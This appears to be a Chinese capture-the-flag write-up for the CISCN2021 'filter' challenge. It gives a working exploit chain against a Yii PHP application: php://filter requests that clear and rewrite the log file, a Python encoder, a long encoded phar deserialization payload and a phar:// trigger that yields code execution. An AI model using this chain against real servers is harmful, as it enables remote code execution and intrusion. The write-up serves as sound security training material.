CISCN2021_0解题目(filter)
0x01 题目初现
题目复现简单,压缩包解压
这里可以关闭debugweb\index.php
首先点开zip文件,这个不用多说
然后还有hint
再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看
VNCTF2021 中的lar题目:https://blog.csdn.net/anwen12/article/details/115127075(这个挺详细
原cve分析:https://xz.aliyun.com/t/9165?page=1
这里面我们从里面拿几条常用的编码组合来消除阻挠
0x02 题目复现
感谢ma牛准备的链子,我直接舔了https://ma4ter.cn/2573.html
赛前准备
清空log文件
http://filter.com/index.php?r=site/index&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
链子生成payload
payload获取方式:
from binascii import b2a_hex
payload = ""
armedPayload = ''
for i in payload:
i = "="+b2a_hex(i.encode('utf-8')).decode('utf-8').upper()
armedPayload += i+"=00"
print("123456789012345"+armedPayload)
payload
发送偶数文件名
http://filter.com/index.php?r=site/index&file=AA
注意这里的payload因为在传输的过程中,回出线
http://filter.com/index.php?r=site/index&file=123456789012345=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=45=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=74=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4D=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4A=00=68=00=64=00=47=00=4E=00=6F=00=55=00=58=00=56=00=6C=00=63=00=6E=00=6C=00=53=00=5A=00=58=00=4E=00=31=00=62=00=48=00=51=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=59=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=5A=00=47=00=4A=00=63=00=51=00=6D=00=46=00=30=00=59=00=32=00=68=00=52=00=64=00=57=00=56=00=79=00=65=00=56=00=4A=00=6C=00=63=00=33=00=56=00=73=00=64=00=41=00=42=00=66=00=5A=00=47=00=46=00=30=00=59=00=56=00=4A=00=6C=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4E=00=76=00=62=00=6D=00=35=00=6C=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=6F=00=69=00=63=00=47=00=52=00=76=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=63=00=32=00=34=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=59=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6B=00=59=00=6C=00=78=00=44=00=62=00=32=00=78=00=31=00=62=00=57=00=35=00=54=00=59=00=32=00=68=00=6C=00=62=00=57=00=46=00=43=00=64=00=57=00=6C=00=73=00=5A=00=47=00=56=00=79=00=49=00=6A=00=6F=00=79=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=35=00=63=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=65=00=43=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=54=00=6F=00=69=00=59=00=32=00=46=00=30=00=5A=00=57=00=64=00=76=00=63=00=6E=00=6C=00=4E=00=59=00=58=00=41=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6A=00=59=00=57=00=4E=00=6F=00=61=00=57=00=35=00=6E=00=58=00=45=00=46=00=79=00=63=00=6D=00=46=00=35=00=51=00=32=00=46=00=6A=00=61=00=47=00=55=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6E=00=4E=00=6C=00=63=00=6D=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4D=00=7A=00=41=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=59=00=32=00=46=00=6A=00=61=00=47=00=6C=00=75=00=5A=00=31=00=78=00=42=00=63=00=6E=00=4A=00=68=00=65=00=55=00=4E=00=68=00=59=00=32=00=68=00=6C=00=41=00=46=00=39=00=6A=00=59=00=57=00=4E=00=6F=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6E=00=67=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=4D=00=53=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=32=00=6B=00=36=00=4D=00=44=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4C=00=52=00=55=00=35=00=6E=00=6D=00=63=00=4E=00=77=00=34=00=66=00=63=00=6D=00=52=00=77=00=38=00=6B=00=42=00=70=00=51=00=63=00=4E=00=31=00=57=00=61=00=71=00=34=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00=0A=00
触发
http://filter.com/index.php?r=site/index&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
触发phar
http://filter.com/index.php?r=site/index&file=phar://../runtime/logs/app.log/1.txt
日志清空成功。
如果不成功就再来一次。
发送偶数文件名
发送payload
完美触发
命令执行完成
0x03 题目吐槽
这个他题900分,截止日期又那么鬼畜,我就没做(当时就一个小时了呜呜)
但是这个题真的不难,远远比不上我Guoke大黑客的技术。
但是中间的偏移和偶数文件名这都是那个cve中讲到的,其实本身也不难,当时真的做一半交一半太垃圾了。
祝各位师傅们哈工大相见。